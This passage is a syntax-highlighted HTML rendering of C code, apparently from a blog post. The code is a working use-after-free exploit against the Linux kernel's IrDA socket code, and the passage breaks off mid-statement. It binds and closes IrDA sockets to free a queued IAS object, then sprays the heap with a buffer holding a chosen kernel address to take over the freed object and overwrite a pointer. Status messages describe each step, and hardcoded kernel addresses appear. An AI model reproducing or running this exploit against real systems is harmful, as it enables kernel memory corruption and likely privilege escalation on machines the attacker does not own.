class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">setsockopt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x10a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-209\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-210\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/printf(&#8220;setsockopt(SET) fd=%d&nbsp;&nbsp;err=%dn&#8221;,fd,err);<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-211\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-212\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-213\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-214\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">irda_bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">u_int16_t&nbsp;&nbsp;<\/span><span 
class=\"crayon-v\">family<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">u_int8_t <\/span><span class=\"crayon-v\">lsap_sel<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sir_addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-215\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-216\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sockaddr_irda <\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">sa1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-217\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-218\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-219\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-220\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">sir_family<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">family<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-221\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">sir_lsap_sel<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lsap_sel<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-222\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">sir_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sir_addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-223\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-224\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memcpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">sir_name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">25<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-225\"><span class=\"crayon-h\">\t<\/span><span 
class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sockaddr<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-226\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/printf(&quot;bind fd=%d err=%d\\n&quot;,fd,err);<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-227\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-228\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-229\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-230\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-231\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">uaf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">long<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-v\">target_addr<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-232\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-233\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">fd2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">fd3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">fd4<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-234\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sockaddr_irda <\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">sa1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-235\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">irda_ias_set <\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-236\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-237\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">pthread_t <\/span><span class=\"crayon-v\">tid<\/span><span 
class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1024<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-238\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-239\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-240\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-241\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">fd1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x17<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-242\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-243\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">fd2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-cn\">0x17<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-244\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-245\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">fd3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x17<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-246\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-247\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">fd4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x17<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-248\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-249\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/* create namespace for xfrm <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-250\"><span 
class=\"crayon-c\">\t * this is not required to trigger the bug<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-251\"><span class=\"crayon-c\">\t *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-252\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">create_ns<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-253\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-254\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">irda_bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&quot;c&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-255\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-256\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-257\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-258\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">irda_bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd2<\/span><span class=\"crayon-sy\">,<\/span><span 
class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4b<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&quot;c&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-259\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">irda_bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4c<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&quot;c&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-260\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">irda_bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&quot;c&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-261\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-262\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-263\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i<\/span><span 
class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-264\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-c\">\/* 0x00 means that it takes self-&gt;ias_obj *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-265\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">irda_set_ias<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&quot;\\x00&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-266\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">irda_set_ias<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&quot;\\x00&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-267\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-268\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-269\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-270\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-271\"><span 
class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-272\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd3<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-273\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-274\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/* annoying the queue and free the first queued object*\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-275\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;[+] Freeing the first queued ias object \\n&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-276\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-277\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-278\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-279\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/getchar();<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-280\"><span class=\"crayon-h\">\t<\/span><span 
class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-281\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">malloc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">4096<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-282\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">pid_t <\/span><span class=\"crayon-v\">pid<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-283\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">u_int64_t <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff81f01500<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-284\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff81efeb60<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-285\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/addr = 0xdeadbeef;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5bad57622f389003567142-286\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target_addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-287\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-288\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xcc<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">88<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-289\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span 
class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-290\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-291\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;[+] Spray memory and take control of the old freed object\\n&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-292\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">spray_heap<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">88<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-293\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">usleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">10000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-294\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-295\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;[+] Allocating new object to overwrite the targetted pointer\\n&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-296\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">irda_bind<\/span><span class=\"crayon-sy\">(<\/span><span 
